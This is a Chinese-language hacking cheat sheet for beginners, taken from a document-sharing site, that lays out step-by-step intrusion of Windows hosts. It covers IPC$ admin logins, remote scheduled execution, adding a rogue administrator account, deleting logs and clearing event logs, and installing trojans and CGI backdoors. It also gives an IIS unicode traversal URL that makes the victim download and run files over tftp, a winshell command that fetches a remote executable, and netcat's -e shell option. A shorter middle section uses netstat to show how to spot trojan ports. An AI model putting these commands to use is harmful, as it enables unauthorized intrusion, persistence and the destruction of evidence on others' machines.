《菜鸟常用命令》由会员分享,可在线阅读,更多相关《菜鸟常用命令(13页珍藏版)》请在金锄头文库上搜索。
1、菜鸟常用命令(与远程主机建立空管连接) net use ip地址ipc$ /use:(以管理员身份登录远程主机) net use ip地址ipc$ 密码 /use:administrator(传送文件到远程主机winnt目录下)copy 本机目录路径程序 ip地址admin$(查看远程主机时间) net time ip地址(定时启动某个程序) at ip地址 02:18 readme.exe(查看共享) net view ip地址(查看netbios工作组列表) nbtstat -a ip地址(将远程主机c盘映射为自己的f盘) net use f: ip地址c$ /user:administr
2、ator(这两条把自己增加到管理员组): net user 用户名 密码 /addnet localgroup administrators 用户名 /add(断开连接) net use ip地址ipc$ /deletedel c:winntsystem32logfiles*.*del c:winntssytem32config*.evtdel c:winntsystem32dtclog*.*del c:winntsystem32*.logdel c:winntsystem32*.txtdel c:winnt*.txtdel c:winnt*.log一、netsvc.exe下面的命令分别是列出
3、主机上的服务项目、查寻和远程启动主机的“时间任务”服务:netsvc /list ip地址netsvc schedule ip地址 /querynetsvc ip地址 schedule /start二、opentelnet.exe远程启动主机的telnet服务,并绑定端口到7878,例如:opentelnet ip地址 用户名 密码 1 7878然后就可以telnet到主机的7878端口,进入dos方式下:telnet ip地址 7878三、winshell.exe一个非常小的木马(不到6k),telnet到主机的7878端口,输入密码winshell,当看到cmd后,可打下面的命令:p pa
4、th (查看winshell主程序的路径信息)b reboot (重新启动机器)d shutdown (关闭机器)s shell (执行后你就会看到可爱的“c:”)x exit (退出本次登录会话,此命令并不终止winshell的运行)cmd http:/./srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)四、3389登陆器,gui方式登录远程主机的五、elsave.exe事件日志清除工具elsave -s ip地址 -l application -celsave -s ip地址 -l system -celsave -s ip地址 -l security -
5、c执行后成功清除应用程序日志,系统日志,安全日志六、hbulot.exe开启win2kserver和winxp的3389服务hbulot /r使用/r表示安装完成后自动重起目标使设置生效。七、nc.exe(netcat.exe)一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。想要连接到某处: nc -options hostname ports ports .绑定端口等待连接: nc -l -p port -options hostname port参数:-e prog 程序重定向,一旦连接,就执行 危险!-g gateway source-routing hop points,
6、 up to 8-g num source-routing pointer: 4, 8, 12, .-h 帮助信息-i secs 延时的间隔-l 监听模式,用于入站连接-n 指定数字的ip地址,不能用hostname-o file 记录16进制的传输-p port 本地端口号-r 任意指定本地及远程端口-s addr 本地源地址-u udp模式-v 详细输出用两个-v可得到更详细的内容-w secs timeout的时间-z 将输入输出关掉用于扫描时八、tftpd32.exe把自己的电脑临时变为一台ftp服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用unicode漏洞或tel
7、net到肉鸡,例如:http:/ip地址/s cripts/.%255c.%255c/winnt/system32/cmd.exe?/c tftp -i 本机ip地址 get 文件名 c:winntsystem32文件名然后可以直接令文件运行:http:/ip地址/s cripts/.%255c.%255c/winnt/system32/cmd.exe?/c+文件名九、prihack.exe是iis的printer远程缓冲区溢出工具idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit
8、.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有asp执行权限的目录。然后用ie浏览器连接。十、弱口令在nt2000xp2003中弱口令可以用Net use ip “password” /user:user如果目标机开3389服务,可以直接连接在sql的sa弱口令可以用sql连接器直接 登陆后门木马如果有ipc$共享,可以copy过去木马后门用at启动AT ip time /INTERACTIVE如果可以得到shell,也可以用tftpT
9、ftp.exe ?Ci ip get *.* *.*然后直接安装 如果有3389,可以自己建一个iis,下载 直接运行管理特殊端口防范木马攻击.木马是一种带有恶意性质的远程控制软件,木马一般分为客户端(Client)和服务器端(Server),客户端就是本地使用的各种命令的控制台,服务器端则是给别人运行,只有运行过服务器端的计算机才能够完全受控。 当前最为常见的木马通常是基于TCP/UDP协议进行client端与server端之间的通讯的,既然利用到这两个协议,就不可避免要在server端(就是被种了木马的机器了)打开监听端口来等待连接。例如鼎鼎大名的冰河使用的监听端口是7626,Back O
10、rifice 2000则是使用54320等等。那么,我们可以利用查看本机开放端口的方法来检查自己是否被种了木马或其它hacker程序。以下是详细方法介绍。 Windows本身自带的netstat命令 Netstat显示协议统计和当前的 TCP/IP 网络连接。该命令只有在安装了 TCP/IP 协议后才可以使用。 netstat -a -e -n -s -p protocol -r interval 参数 -a 显示所有连接和侦听端口。服务器连接通常不显示。 -e 显示以太网统计。该参数可以与 -s 选项结合使用。 -n 以数字格式显示地址和端口号(而不是尝试查找名称)。 -s 显示每个协议的统
11、计。默认情况下,显示 TCP、UDP、ICMP 和 IP 的统计。-p 选项可以用来指定默认的子集。 -p protocol 显示由 protocol 指定的协议的连接;protocol 可以是 tcp 或 udp。如果与 -s 选项一同使用显示每个协议的统计,protocol 可以是 tcp、udp、icmp 或 ip。 -r 显示路由表的内容。 interval 重新显示所选的统计,在每次显示之间暂停 interval 秒。按 CTRL+B 停止重新显示统计。如果省略该参数,netstat 将打印一次当前的配置信息。 现在,我们掌握netstat命令的使用方法了,下面就让我们现学现用,用这
12、个命令看一下自己的机器开放的端口。进入到命令行下,使用netstat命令的a和n两个参数: C:netstat -a -n Active Connections Proto Local ADDRess Foreign Address State TCP 0.0.0.0:80 0.0.0.0:0 LISTENING TCP 0.0.0.0:21 0.0.0.0:0 LISTENING TCP 0.0.0.0:7626 0.0.0.0:0 LISTENING UDP 0.0.0.0:445 0.0.0.0:0 UDP 0.0.0.0:1046 0.0.0.0:0 UDP 0.0.0.0:1047
13、0.0.0.0:0 解释一下,Active Connections是指当前本机活动连接,Proto是指连接使用的协议名称,Local Address是本地计算机的 IP 地址和连接正在使用的端口号,Foreign Address是连接该端口的远程计算机的 IP 地址和端口号,State则是表明TCP 连接的状态,你可以看到后面三行的监听端口是UDP协议的,所以没有State表示的状态。通过以上可以看出该机器的7626端口已经开放,正在监听等待连接,像这样的情况极有可能是已经感染了冰河!所以应该急忙断开网络,并用杀毒软件查杀病毒。转载请注明出自黑客手册技术论坛 http:/ 现在满天都是黑客教程
14、,但真正有用的不多,下面介绍一种WIN9X下的入侵方法:1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。 2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明 4.在Windows目录下有一文件名为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件: XX.XX.XX.XX 电脑名 5.开DOS窗口键入 NBTSTAT -R 6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击即可进入。
